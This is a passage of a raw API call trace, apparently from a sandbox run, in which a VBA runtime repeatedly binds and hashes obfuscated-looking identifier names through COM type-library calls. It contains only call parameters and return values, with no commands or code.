ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80cde, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ckBAAU") returned 7 [0069.471] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ckBAAU", lHashVal=0x10fcd6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80cde, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ckBAAU") returned 7 [0069.471] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ckBAAU", lHashVal=0x10fcd6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.471] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ckBAAU") returned 0x10fcd6 [0069.471] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="ckBAAU" | out: _Dst="ckBAAU") returned 0x0 [0069.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="ckBAAU") returned 7 [0069.471] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.471] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ckBAAU", lHashVal=0x10fcd6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.471] IUnknown:Release (This=0x665ba50) returned 0xd [0069.471] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.471] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ckBAAU", lHashVal=0x10fcd6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.471] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.471] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.471] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ckBAAU", lHashVal=0x10fcd6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.471] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.471] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.471] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ckBAAU", lHashVal=0x10fcd6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.471] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80cde, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ckBAAU") returned 7 [0069.471] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ckBAAU", lHashVal=0x10fcd6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.471] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.471] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80cde | out: _Dst=0x67c2d40) returned 0x0 [0069.472] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ckBAAU") returned 0x107740 [0069.472] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_ckBAAU" | out: _Dst="_B_var_ckBAAU") returned 0x0 [0069.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_ckBAAU") returned 14 [0069.472] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.472] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ckBAAU", lHashVal=0x107740, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.472] IUnknown:Release (This=0x665ba50) returned 0xd [0069.472] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.472] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ckBAAU", lHashVal=0x107740, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.472] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.472] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.472] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ckBAAU", lHashVal=0x107740, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.472] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.472] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.472] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ckBAAU", lHashVal=0x107740, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.472] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.472] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.472] IUnknown:Release (This=0x665ba50) returned 0xd [0069.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12e9e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_ckBAAU") returned 14 [0069.472] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ckBAAU", lHashVal=0x107740, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.472] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80cde | out: _Dst=0x144ec0) returned 0x0 [0069.472] ITypeComp:RemoteBind (in: This=0x665ba60, szName="rBADoAC", lHashVal=0x106a5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.472] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80dd6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="rBADoAC") returned 8 [0069.472] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="rBADoAC", lHashVal=0x106a5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80dd6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="rBADoAC") returned 8 [0069.473] ITypeComp:RemoteBind (in: This=0x665bd30, szName="rBADoAC", lHashVal=0x106a5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.473] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rBADoAC") returned 0x106a5d [0069.473] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="rBADoAC" | out: _Dst="rBADoAC") returned 0x0 [0069.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="rBADoAC") returned 8 [0069.473] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.473] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="rBADoAC", lHashVal=0x106a5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.473] IUnknown:Release (This=0x665ba50) returned 0xd [0069.473] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.473] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="rBADoAC", lHashVal=0x106a5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.473] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.473] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.473] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="rBADoAC", lHashVal=0x106a5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.473] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.473] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.473] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="rBADoAC", lHashVal=0x106a5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.473] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80dd6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="rBADoAC") returned 8 [0069.473] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="rBADoAC", lHashVal=0x106a5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.473] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.473] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80dd6 | out: _Dst=0x67c2d40) returned 0x0 [0069.473] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_rBADoAC") returned 0x105e60 [0069.473] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_rBADoAC" | out: _Dst="_B_var_rBADoAC") returned 0x0 [0069.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_rBADoAC") returned 15 [0069.474] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.474] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_rBADoAC", lHashVal=0x105e60, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.474] IUnknown:Release (This=0x665ba50) returned 0xd [0069.474] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.474] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_rBADoAC", lHashVal=0x105e60, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.474] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.474] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.474] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_rBADoAC", lHashVal=0x105e60, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.474] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.474] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.474] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_rBADoAC", lHashVal=0x105e60, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.474] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.474] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.474] IUnknown:Release (This=0x665ba50) returned 0xd [0069.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12ece, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_rBADoAC") returned 15 [0069.474] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_rBADoAC", lHashVal=0x105e60, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x6f004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x6f004400000000, pDummy=0x0) returned 0x0 [0069.474] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80dd6 | out: _Dst=0x144ec0) returned 0x0 [0069.474] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ODAADQAX", lHashVal=0x10dcb2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80daa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ODAADQAX") returned 9 [0069.474] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ODAADQAX", lHashVal=0x10dcb2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80daa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ODAADQAX") returned 9 [0069.474] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ODAADQAX", lHashVal=0x10dcb2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ODAADQAX") returned 0x10dcb2 [0069.475] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="ODAADQAX" | out: _Dst="ODAADQAX") returned 0x0 [0069.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="ODAADQAX") returned 9 [0069.475] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.475] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ODAADQAX", lHashVal=0x10dcb2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.475] IUnknown:Release (This=0x665ba50) returned 0xd [0069.475] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.475] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ODAADQAX", lHashVal=0x10dcb2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.475] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.475] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.475] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ODAADQAX", lHashVal=0x10dcb2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.475] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.475] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.475] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ODAADQAX", lHashVal=0x10dcb2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.475] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80daa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="ODAADQAX") returned 9 [0069.475] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ODAADQAX", lHashVal=0x10dcb2, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.475] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.475] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80daa | out: _Dst=0x67c2d40) returned 0x0 [0069.475] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ODAADQAX") returned 0x10b43b [0069.475] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_ODAADQAX" | out: _Dst="_B_var_ODAADQAX") returned 0x0 [0069.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_ODAADQAX") returned 16 [0069.475] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.475] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ODAADQAX", lHashVal=0x10b43b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.475] IUnknown:Release (This=0x665ba50) returned 0xd [0069.475] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.475] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ODAADQAX", lHashVal=0x10b43b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.476] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.476] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.476] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ODAADQAX", lHashVal=0x10b43b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.476] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.476] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.476] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ODAADQAX", lHashVal=0x10b43b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.476] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.476] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.476] IUnknown:Release (This=0x665ba50) returned 0xd [0069.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12efe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_ODAADQAX") returned 16 [0069.476] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ODAADQAX", lHashVal=0x10b43b, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0069.476] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80daa | out: _Dst=0x144ec0) returned 0x0 [0069.476] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uGAABXA", lHashVal=0x100010, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80dfe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uGAABXA") returned 8 [0069.476] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uGAABXA", lHashVal=0x100010, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80dfe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uGAABXA") returned 8 [0069.476] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uGAABXA", lHashVal=0x100010, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.476] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uGAABXA") returned 0x100010 [0069.476] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="uGAABXA" | out: _Dst="uGAABXA") returned 0x0 [0069.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="uGAABXA") returned 8 [0069.476] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.476] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uGAABXA", lHashVal=0x100010, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.477] IUnknown:Release (This=0x665ba50) returned 0xd [0069.477] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.477] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uGAABXA", lHashVal=0x100010, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.477] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.477] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.477] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uGAABXA", lHashVal=0x100010, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.477] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.477] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.477] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uGAABXA", lHashVal=0x100010, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.477] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80dfe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uGAABXA") returned 8 [0069.477] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uGAABXA", lHashVal=0x100010, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.477] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.477] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80dfe | out: _Dst=0x67c2d40) returned 0x0 [0069.477] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uGAABXA") returned 0x10f452 [0069.477] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_uGAABXA" | out: _Dst="_B_var_uGAABXA") returned 0x0 [0069.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_uGAABXA") returned 15 [0069.477] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.477] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uGAABXA", lHashVal=0x10f452, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.477] IUnknown:Release (This=0x665ba50) returned 0xd [0069.477] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.477] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uGAABXA", lHashVal=0x10f452, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.477] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.477] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.477] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uGAABXA", lHashVal=0x10f452, pfName=0x144d70, pBstrLibName=0x144ca0 | out: 